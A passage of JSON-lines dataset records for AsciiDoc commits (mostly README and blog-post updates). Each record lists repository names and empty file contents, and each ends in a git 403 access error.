'https:\/\/github.com\/sebhoss\/memoization.java.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"fa2b0ed7d9476302f0f33efd045225c9cab06f63","subject":"Update 2015-08-09-Hola-Mundo.adoc","message":"Update 2015-08-09-Hola-Mundo.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2154e92a8460145c8678816c78e1eb4d66468912","subject":".tavis.yml\u3092\u30b3\u30df\u30c3\u30c8\u3002","message":".tavis.yml\u3092\u30b3\u30df\u30c3\u30c8\u3002\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f900000de22b790b16764f7441b0b7c0c99b67ec","subject":"Updated README","message":"Updated README\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cc02b997ec7fb428e2967cab819e74d9ed1e762","subject":"Added section for Tomcat","message":"Added section for Tomcat\n","repos":"waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766ee43750dcfc1136d981a68c769e22cceb3e54","subject":"Update README.adoc","message":"Update README.adoc\n\nAdd flattr button","repos":"plyom\/hubpress.io,gsha0\/hubpress.io,binout\/javaonemorething,dsuryakusuma\/dsuryakusuma.github.io,errorval\/blog,fghhfg\/hubpress.io,Nepal-Blockchain\/danphe-blogs,PerthHackers\/blog,ml4den\/hubpress,isaacriquelme\/endata.do,crotel\/meditation,codetricity\/journey,nandansaha\/AroundTheWeb,philippevidal80\/blog,sebprev\/blog,binout\/javaonemorething,sebarid\/pages,dsuryakusuma\/dsuryakusuma.github.io,Port666\/hubpress.io,OdieD8\/hubpress.io,jamarortiz\/pragmaticalware,tmdgus0118\/blog.code404.co.kr,ottoandry\/ottoandry1,wzzrd\/hubpress.io,rorosaurus\/hubpress.io,fwalloe\/infosecbriefly,ErJ101\/hbspractise,nicolaschaillot\/pechdencouty,ambarishpande\/blog,thaibeouu\/blog,alexknowshtml\/thebigmove,sanctumware\/hubpress,ambarishpande\/blog,qingyuqy\/qingyuqy.io,matthardwick\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,OdieD8\/hubpress.io,jerometambo\/blog,isaacriquelme\/endata.do,abesn\/hubpress.io,hiun\/hubpress.io,BenBals\/hubpress,OlympusOnline2\/announcements,fghhfg\/hubpress.io,bemug\/devblog,ReadyP1\/hubpress.io,rynop\/rynop.hubpress.io,vuthaihoc\/vuthaihoc.github.io,loetjoe\/blog,entropyz\/blog,SockPastaRock\/hubpress.io,rynop\/rynop.hubpress.io,topluluk\/blog,kornel661\/blog-test-jm,rubyinhell\/hubpress.io,jcsirot\/hubpress.io,ErJ101\/hbspractise,sillyleo\/bible.notes,adest\/press,ottoandry\/ottoandry1,ruaqiwei23\/blog,andreassiegelrfid\/hubpress.io,heartnn\/hubpress.io,mcornell\/OFM,BenBals\/hubpress,SockPastaRock\/hubpress.io,sharmivssharmi\/sharmipress,mcornell\/OFM,sebarid\/pages,pdudits\/pdudits.github.io,simonturesson\/hubpresstestsimon,paolo215\/blog,devananda\/devananda.github.io,sharmivssharmi\/sharmipress,mrtrombley\/blog,magivfer\/pages,lawrencetaylor\/hubpress.io,sebprev\/blog,Perthmastersswimming\/hubpress.io,trycrmr\/hubpress.io,melix\/hubpress,discimport\/blog.discimport.dk,ditirambo\/ditirambo.es,JohanBrunet\/hubpress.io,chackomathew\/blog,PerthHackers\/blog,DavidTPate\/davidtpate.com,mcornell\/OFM,gogonkt\/makenothing,crotel\/studio,cmhgroupllc\/blog,simpleHoChun\/blog,alexhanschke\/hubpress.io,Jekin6\/blog,jlcurty\/jlcurty.github.io-,tom-konda\/blog,atomfrede\/shiny-adventure,apoch\/blog,joshuarrrr\/hubpress.io,manelvf\/blog,christofmarti\/blog,PerthHackers\/blog,eimajenthat\/hubpress.io,jcsirot\/hubpress.io,nicksam112\/nicksam112.github.io,Astrokoala-Studio\/hubpress.io,Abdul2\/abdul2.github.io,hang-h\/hubpress.io,hva314\/blog,akhmetgali\/hubpress.io,DaOesten\/hubpress.io,Abdul2\/abdul2.github.io,sillyleo\/bible.notes,jabbytechnologies\/blog,Nepal-Blockchain\/danphe-blogs,berryzed\/tech-blog,eimajenthat\/hubpress.io,rorosaurus\/hubpress.io,nicksam112\/nicksam112.github.io,entropyz\/blog,ciena-blueplanet\/developers.blog,csiebler\/hubpress-test,mairandomness\/randomblog,loetjoe\/blog,errorval\/blog,baocongchen\/blogs,qingyuqy\/qingyuqy.io,yelangya3826850\/monaenhubpress,anandjagadeesh\/blog,ashalkhakov\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,gilangdanu\/blog,manelvf\/blog,demiansan\/demiansan.github.io,danen-carlson\/blog,crotel\/studio,sebarid\/pages,crobby\/hubpress.io,sakkemo\/blog,sakkemo\/blog,alexhanschke\/hubpress.io,mrtrombley\/blog,sanctumware\/hubpress,harichen\/harichen.io,benignbala\/benignbala.hubpress.io,anshu92\/blog,rorohiko21\/blog,gilangdanu\/blog,atomfrede\/shiny-adventure,sakkemo\/blog,julianrichen\/blog,hang-h\/hubpress.io,elinep\/blog,nicolaschaillot\/pechdencouty,Bloggerschmidt\/bloggerschmidt.de,dmacstack\/glob,pramodjg\/articles,xinmeng1\/note,igovsol\/blog,RussellSnyder\/hubpress-test,yelangya3826850\/monaenhubpress,cmolitor\/blog,joshuarrrr\/hubpress.io,aspick\/hubpress.io,ml4den\/hubpress,ice09\/ice09ng,lrabiet\/patisserie,sxgc\/blog,mufarooqq\/blog,andreassiegelrfid\/hubpress.io,pascalgrimaud\/hubpress.io,pdudits\/pdudits.github.io,dsuryakusuma\/dsuryakusuma.github.io,aspick\/hubpress.io,philippevidal80\/blog,thesagarsutar\/hubpress,marksubbarao\/hubpress.io,clear-project\/blog,dmacstack\/glob,sanctumware\/hubpress,msavy\/rhymewithgravy.com,gsha0\/hubpress.io,jlmcgehee21\/nooganeer,tehbilly\/blog,trycrmr\/hubpress.io,setupminimal\/blog,anandjagadeesh\/blog,joescharf\/joescharf.github.io,yelangya3826850\/monaenhubpress,mufarooqq\/blog,fwalloe\/infosecbriefly,iKnowMagic\/hubpress.io,ditirambo\/ditirambo.es,josegomezr\/blog,dawn-chiniquy\/clear-project.org,Perthmastersswimming\/hubpress.io,erramuzpe\/gsoc2016,mcornell\/OFM,magivfer\/pages,simonturesson\/hubpresstestsimon,jjmean2\/server-study,sebprev\/blog,hva314\/blog,ReadyP1\/hubpress.io,Abdul2\/abdul2.github.io,melix\/hubpress,willcrisis\/www.willcrisis.com,tom-konda\/blog,lrabiet\/patisserie,codelab-lbernard\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,JohanBrunet\/hubpress.io,AirHacX\/blog.airhacx.com,OlympusOnline2\/announcements,crotel\/studio,seturne\/hubpress.io,roelvs\/hubpress.io,laibaogo\/hubpress.io,201507\/blog,Jason2013\/hubpress,shinnoki\/hubpress.io,fghhfg\/hubpress.io,porolakka\/hubpress.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,201507\/blog,thesagarsutar\/hubpress,cmolitor\/blog,iKnowMagic\/hubpress.io,jpcanovas\/myBlog,amberry\/blog,joshuarrrr\/hubpress.io,alexhanschke\/hubpress.io,mcrotty\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,princeminz\/blog,julianrichen\/blog,whelamc\/life,harichen\/harichen.io,amberry\/blog,manelvf\/blog,setupminimal\/blog,gbougeard\/blog.english,rorohiko21\/blog,shinnoki\/hubpress.io,melix\/hubpress,aspick\/hubpress.io,mrtrombley\/blog,sharmivssharmi\/sharmipress,ruaqiwei23\/blog,adamperer\/diary,Bloggerschmidt\/bloggerschmidt.de,crotel\/meditation,Adyrhan\/adyrhan.github.io,kobusb\/blog,kornel661\/blog-test-jm,hutchr\/hutchr.github.io,apoch\/blog,nthline\/hubpress.io,jamarortiz\/pragmaticalware,mrtrombley\/blog,tmdgus0118\/blog.code404.co.kr,willcrisis\/www.willcrisis.com,Adyrhan\/adyrhan.github.io,aspick\/hubpress.io,yangsheng1107\/hubpress.io,aql\/hubpress.io,kim0\/hubpress.io,ErJ101\/hbspractise,ashalkhakov\/hubpress.io,chackomathew\/blog,xinmeng1\/note,abesn\/hubpress.io,roelvs\/hubpress.io,lawrencetaylor\/hubpress.io,jlcurty\/jlcurty.github.io-,DavidTPate\/davidtpate.com,puff-tw\/hubpress.io,kornel661\/blog-test-jm,benignbala\/benignbala.hubpress.io,pdudits\/hubpress,jerometambo\/blog,gogonkt\/makenothing,AirHacX\/blog.airhacx.com,sanctumware\/hubpress,pdudits\/pdudits.github.io,jbutz\/hubpress-test,rorosaurus\/hubpress.io,chackomathew\/blog,mairandomness\/randomblog,mikqi\/blog,fwalloe\/infosecbriefly,natsu90\/hubpress.io,thesagarsutar\/hubpress,OlympusOnline2\/announcements,adjiebpratama\/press,jamarortiz\/pragmaticalware,kim0\/hubpress.io,nandansaha\/AroundTheWeb,vuthaihoc\/vuthaihoc.github.io,adest\/press,magivfer\/pages,harichen\/harichen.io,akhmetgali\/hubpress.io,Evolution2626\/blog,shunkou\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,alexknowshtml\/thebigmove,joescharf\/joescharf.github.io,anandjagadeesh\/blog,sxgc\/blog,rorosaurus\/hubpress.io,IEEECompute\/blog,igovsol\/blog,celsogg\/blog,porolakka\/hubpress.io,RussellSnyder\/hubpress-test,elinep\/blog,ice09\/ice09ng,AlexL777\/hubpressblog,thaibeouu\/blog,RussellSnyder\/hubpress-test,lichengzhu\/blog,qingyuqy\/qingyuqy.io,miroque\/shirokuma,SnorlaxH\/blog.urusa.me,corporatesanyasi\/corporatesanyasi.github.io,victorcouste\/blog,dawn-chiniquy\/clear-project.org,Perthmastersswimming\/hubpress.io,e-scape\/blog,apoch\/blog,rubyinhell\/hubpress.io,magivfer\/pages,koter84\/blog,Astrokoala-Studio\/hubpress.io,anthonny\/personal-blog,shinnoki\/hubpress.io,itsmyr4bbit\/blog,wzzrd\/hubpress.io,jjmean2\/server-study,Jekin6\/blog,simpleHoChun\/blog,elinep\/blog,christofmarti\/blog,andreassiegelrfid\/hubpress.io,anshu92\/blog,discimport\/blog.discimport.dk,lauesa\/Blog,pdudits\/hubpress,tom-konda\/blog,palaxi00\/palaxi00.github.io,jjmean2\/server-study,thesagarsutar\/hubpress,porolakka\/hubpress.io,ml4den\/hubpress,agentmilindu\/hubpress.io,seturne\/hubpress.io,gilangdanu\/blog,whelamc\/life,nicksam112\/nicksam112.github.io,clear-project\/blog,jamarortiz\/pragmaticalware,crotel\/meditation,shunkou\/blog,josegomezr\/blog,clear-project\/blog,benignbala\/hubpress.io,jbutz\/hubpress-test,codetricity\/journey,adamperer\/diary,pej\/hubpress.io,mrfgl\/blog,anthonny\/personal-blog,hiun\/hubpress.io,atomfrede\/shiny-adventure,OlympusOnline2\/announcements,lawrencetaylor\/hubpress.io,xinmeng1\/note,mkent-at-rivermeadow-dot-com\/hubpress.io,paolo215\/blog,benignbala\/benignbala.hubpress.io,Astrokoala-Studio\/hubpress.io,mrfgl\/blog,agentmilindu\/hubpress.io,crobby\/hubpress.io,bemug\/devblog,SockPastaRock\/hubpress.io,jcsirot\/hubpress.io,andreassiegelrfid\/hubpress.io,devananda\/devananda.github.io,setupminimal\/blog,agentmilindu\/hubpress.io,mikqi\/blog,trycrmr\/hubpress.io,lawrencetaylor\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,julianrichen\/blog,mimiz\/mimiz.github.io,hang-h\/hubpress.io,agentmilindu\/hubpress.io,ReadyP1\/hubpress.io,JacobSamro\/blog,manelvf\/blog,mufarooqq\/blog,tehbilly\/blog,blackGirlsCode\/blog,cmhgroupllc\/blog,sxgc\/blog,apoch\/blog,laibaogo\/hubpress.io,pej\/hubpress.io,topluluk\/blog,IEEECompute\/blog,mikqi\/blog,e-scape\/blog,lrabiet\/patisserie,roelvs\/hubpress.io,mrfgl\/blog,gbougeard\/blog.english,natsu90\/hubpress.io,baocongchen\/blogs,thaibeouu\/blog,Lukas238\/the-holodeck,jmini\/hubpress.io,sebprev\/blog,jerometambo\/blog,chackomathew\/blog,booleanbalaji\/hubpress.io,nthline\/hubpress.io,Nepal-Blockchain\/danphe-blogs,princeminz\/blog,moonPress\/press.io,lichengzhu\/blog,MinxianLi\/hubpress.io,btsibr\/myhubpress,nandansaha\/AroundTheWeb,willcrisis\/www.willcrisis.com,arabindamoni\/hubpress.io,pascalgrimaud\/hubpress.io,demiansan\/demiansan.github.io,csiebler\/hubpress-test,celsogg\/blog,ucide-coruptia\/ucide-coruptia.ro,joescharf\/joescharf.github.io,blackGirlsCode\/blog,palaxi00\/palaxi00.github.io,cmhgroupllc\/blog,rynop\/rynop.hubpress.io,binout\/javaonemorething,btsibr\/myhubpress,miroque\/shirokuma,baocongchen\/blogs,ruaqiwei23\/blog,Lukas238\/the-holodeck,ml4den\/hubpress,ucide-coruptia\/ucide-coruptia.ro,pdudits\/hubpress,Jason2013\/hubpress,Lukas238\/the-holodeck,pej\/hubpress.io,dmacstack\/glob,jmini\/hubpress.io,porolakka\/hubpress.io,ruaqiwei23\/blog,JacobSamro\/blog,gogonkt\/makenothing,adjiebpratama\/press,kornel661\/blog-test-jm,moonPress\/press.io,puff-tw\/hubpress.io,msavy\/rhymewithgravy.com,ice09\/ice09ng,gsha0\/hubpress.io,willcrisis\/www.willcrisis.com,berryzed\/tech-blog,eimajenthat\/hubpress.io,moonPress\/press.io,adjiebpratama\/press,abesn\/hubpress.io,rynop\/rynop.hubpress.io,Bloggerschmidt\/bloggerschmidt.de,celsogg\/blog,amberry\/blog,jcsirot\/hubpress.io,JohanBrunet\/hubpress.io,codetricity\/journey,topicusonderwijs\/topicusonderwijs.github.io,fwalloe\/infosecbriefly,adest\/press,danen-carlson\/blog,lauesa\/Blog,koter84\/blog,anthonny\/personal-blog,philippevidal80\/blog,bemug\/devblog,mcrotty\/hubpress.io,josegomezr\/blog,booleanbalaji\/hubpress.io,benignbala\/benignbala.hubpress.io,loetjoe\/blog,arabindamoni\/hubpress.io,Evolution2626\/blog,Jekin6\/blog,igovsol\/blog,xinmeng1\/note,shunkou\/blog,lichengzhu\/blog,ashalkhakov\/hubpress.io,rorohiko21\/blog,ditirambo\/ditirambo.es,sebarid\/pages,thaibeouu\/blog,christofmarti\/blog,heartnn\/hubpress.io,jerometambo\/blog,atomfrede\/shiny-adventure,hva314\/blog,gbougeard\/blog.english,pascalgrimaud\/hubpress.io,pramodjg\/articles,dsuryakusuma\/dsuryakusuma.github.io,loetjoe\/blog,seturne\/hubpress.io,discimport\/blog.discimport.dk,shunkou\/blog,pramodjg\/articles,Port666\/hubpress.io,ashalkhakov\/hubpress.io,lichengzhu\/blog,AnassKartit\/anasskartit.github.io,nicolaschaillot\/pechdencouty,binout\/javaonemorething,berryzed\/tech-blog,sakkemo\/blog,Jason2013\/hubpress,csiebler\/hubpress-test,SockPastaRock\/hubpress.io,jfavlam\/Concepts,melix\/hubpress,nthline\/hubpress.io,DavidTPate\/davidtpate.com,josegomezr\/blog,tmdgus0118\/blog.code404.co.kr,paolo215\/blog,akhmetgali\/hubpress.io,hutchr\/hutchr.github.io,akhmetgali\/hubpress.io,matthardwick\/hubpress.io,Nepal-Blockchain\/danphe-blogs,btsibr\/myhubpress,matthardwick\/hubpress.io,jabbytechnologies\/blog,jsiu22\/blog,cmhgroupllc\/blog,jsiu22\/blog,artavels\/pages,koter84\/blog,plyom\/hubpress.io,berryzed\/tech-blog,laibaogo\/hubpress.io,elinep\/blog,yangsheng1107\/hubpress.io,msavy\/rhymewithgravy.com,mrfgl\/blog,anthonny\/personal-blog,cmolitor\/blog,corporatesanyasi\/corporatesanyasi.github.io,AlexL777\/hubpressblog,crobby\/hubpress.io,kim0\/hubpress.io,ErJ101\/hbspractise,anwfr\/blog.anw.fr,IEEECompute\/blog,juhuntenburg\/gsoc2017,Jason2013\/hubpress,201507\/blog,ncomet\/asciiblog,marksubbarao\/hubpress.io,shinnoki\/hubpress.io,kobusb\/blog,heartnn\/hubpress.io,simonturesson\/hubpresstestsimon,benignbala\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,celsogg\/blog,lrabiet\/patisserie,juhuntenburg\/gsoc2017,dmacstack\/glob,nandansaha\/AroundTheWeb,heartnn\/hubpress.io,jsiu22\/blog,hutchr\/hutchr.github.io,anshu92\/blog,jabbytechnologies\/blog,MinxianLi\/hubpress.io,DavidTPate\/davidtpate.com,gsha0\/hubpress.io,SnorlaxH\/blog.urusa.me,princeminz\/blog,topicusonderwijs\/topicusonderwijs.github.io,pdudits\/hubpress,Port666\/hubpress.io,seturne\/hubpress.io,kobusb\/blog,eimajenthat\/hubpress.io,arabindamoni\/hubpress.io,pej\/hubpress.io,Adyrhan\/adyrhan.github.io,hva314\/blog,kobusb\/blog,brendena\/hubpress.io,jjmean2\/server-study,crotel\/studio,joescharf\/joescharf.github.io,erramuzpe\/gsoc2016,baocongchen\/blogs,brendena\/hubpress.io,aql\/hubpress.io,DaOesten\/hubpress.io,codelab-lbernard\/blog,arabindamoni\/hubpress.io,entropyz\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,devananda\/devananda.github.io,whelamc\/life,aql\/hubpress.io,anshu92\/blog,topicusonderwijs\/topicusonderwijs.github.io,booleanbalaji\/hubpress.io,fghhfg\/hubpress.io,rubyinhell\/hubpress.io,jlmcgehee21\/nooganeer,miroque\/shirokuma,simpleHoChun\/blog,JohanBrunet\/hubpress.io,mimiz\/mimiz.github.io,msavy\/rhymewithgravy.com,danen-carlson\/blog,anandjagadeesh\/blog,SnorlaxH\/blog.urusa.me,jbutz\/hubpress-test,natsu90\/hubpress.io,isaacriquelme\/endata.do,miroque\/shirokuma,Lukas238\/the-holodeck,wzzrd\/hubpress.io,Jekin6\/blog,DaOesten\/hubpress.io,isaacriquelme\/endata.do,pepite\/hubpress.io,itsmyr4bbit\/blog,plyom\/hubpress.io,palaxi00\/palaxi00.github.io,mufarooqq\/blog,itsmyr4bbit\/blog,AlexL777\/hubpressblog,jsiu22\/blog,PerthHackers\/blog,mcrotty\/hubpress.io,pdudits\/pdudits.github.io,AnassKartit\/anasskartit.github.io,ottoandry\/ottoandry1,wzzrd\/hubpress.io,MinxianLi\/hubpress.io,hang-h\/hubpress.io,palaxi00\/palaxi00.github.io,adamperer\/diary,setupminimal\/blog,anwfr\/blog.anw.fr,palaxi00\/palaxi00.github.io,yangsheng1107\/hubpress.io,mimiz\/mimiz.github.io,jpcanovas\/myBlog,rubyinhell\/hubpress.io,princeminz\/blog,JacobSamro\/blog,simonturesson\/hubpresstestsimon,jabbytechnologies\/blog,mcrotty\/hubpress.io,ciena-blueplanet\/developers.blog,AnassKartit\/anasskartit.github.io,topluluk\/blog,dawn-chiniquy\/clear-project.org,codelab-lbernard\/blog,victorcouste\/blog,Port666\/hubpress.io,christofmarti\/blog,jmini\/hubpress.io,benignbala\/hubpress.io,marksubbarao\/hubpress.io,koter84\/blog,julianrichen\/blog,anwfr\/blog.anw.fr,mkent-at-rivermeadow-dot-com\/hubpress.io,errorval\/blog,laibaogo\/hubpress.io,devananda\/devananda.github.io,ciena-blueplanet\/developers.blog,ice09\/ice09ng,ncomet\/asciiblog,roelvs\/hubpress.io,nicolaschaillot\/pechdencouty,qingyuqy\/qingyuqy.io,yaks-all-the-way-down\/hubpress.github.io,jlmcgehee21\/nooganeer,abesn\/hubpress.io,btsibr\/myhubpress,alexknowshtml\/thebigmove,jpcanovas\/myBlog,matthardwick\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,Evolution2626\/blog,brendena\/hubpress.io,duggiemitchell\/JavascriptMuse,palaxi00\/palaxi00.github.io,jbutz\/hubpress-test,nthline\/hubpress.io,rorohiko21\/blog,OdieD8\/hubpress.io,jlcurty\/jlcurty.github.io-,AirHacX\/blog.airhacx.com,josegomezr\/blog,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,palaxi00\/palaxi00.github.io,marksubbarao\/hubpress.io,ncomet\/asciiblog,RussellSnyder\/hubpress-test,hiun\/hubpress.io,artavels\/pages,vuthaihoc\/vuthaihoc.github.io,artavels\/pages,igovsol\/blog,e-scape\/blog,sillyleo\/bible.notes,jfavlam\/Concepts,mairandomness\/randomblog,pepite\/hubpress.io,pepite\/hubpress.io,discimport\/blog.discimport.dk,ottoandry\/ottoandry1,sxgc\/blog,iKnowMagic\/hubpress.io,Evolution2626\/blog,joshuarrrr\/hubpress.io,pramodjg\/articles,puff-tw\/hubpress.io,victorcouste\/blog,crotel\/meditation,Adyrhan\/adyrhan.github.io,ambarishpande\/blog,SnorlaxH\/blog.urusa.me,sharmivssharmi\/sharmipress,moonPress\/press.io,philippevidal80\/blog,ciena-blueplanet\/developers.blog,gbougeard\/blog.english,ditirambo\/ditirambo.es,adjiebpratama\/press,mairandomness\/randomblog,anwfr\/blog.anw.fr,IEEECompute\/blog,DaOesten\/hubpress.io,AlexL777\/hubpressblog,iKnowMagic\/hubpress.io,plyom\/hubpress.io,juhuntenburg\/gsoc2017,Astrokoala-Studio\/hubpress.io,demiansan\/demiansan.github.io,BenBals\/hubpress,erramuzpe\/gsoc2016,blackGirlsCode\/blog,tehbilly\/blog,Perthmastersswimming\/hubpress.io,nicksam112\/nicksam112.github.io,alexknowshtml\/thebigmove,artavels\/pages,amberry\/blog,tom-konda\/blog,crobby\/hubpress.io,ncomet\/asciiblog,pepite\/hubpress.io,hiun\/hubpress.io,cmolitor\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,lauesa\/Blog,OdieD8\/hubpress.io,mikqi\/blog,hutchr\/hutchr.github.io,erramuzpe\/gsoc2016,AnassKartit\/anasskartit.github.io,gogonkt\/makenothing,lauesa\/Blog,brendena\/hubpress.io,entropyz\/blog,Abdul2\/abdul2.github.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mimiz\/mimiz.github.io,aql\/hubpress.io,YvonneZhang\/yvonnezhang.github.io,ambarishpande\/blog,jlmcgehee21\/nooganeer,ucide-coruptia\/ucide-coruptia.ro,trycrmr\/hubpress.io,jfavlam\/Concepts,benignbala\/hubpress.io,juhuntenburg\/gsoc2017,tmdgus0118\/blog.code404.co.kr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"004799bd2f0e906863c7270317fed792d9d9b4ef","subject":"Reformatted README","message":"Reformatted README\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c9b8ae1aaa59870a8738ce787f0f600ffc76f88","subject":"Updated documentationd","message":"Updated documentationd","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"711dcb39bffd3f57817f23f3495b23e220f44e67","subject":"initial commit","message":"initial commit\n","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eclipse\/rdf4j.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"1fe3506168c9966cc4fc1e578ae6215151bd8445","subject":"Specify recommended version of gpg4win","message":"Specify recommended version of gpg4win","repos":"dejavusecurity\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dejavusecurity\/OutlookPrivacyPlugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b67f2f9ac885e1664a2fbc79262064fc0d14daa6","subject":"Updated copy elision","message":"Updated copy elision\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"653cfcd40725d231694468aaa917aa00f4bd7383","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"341d0ea54780342d6d993f5b2dc174e577393e3d","subject":"Update 2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","message":"Update 2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","new_file":"_posts\/2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e0eeda7b163a4d3b0cc9dbda94b82ed2f609c30","subject":"y2b create post TOP SECRET SMARTPHONE","message":"y2b create post TOP SECRET SMARTPHONE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-06-TOP-SECRET-SMARTPHONE.adoc","new_file":"_posts\/2016-04-06-TOP-SECRET-SMARTPHONE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6055f70fad7f4711f975009477b06bde21170d1","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 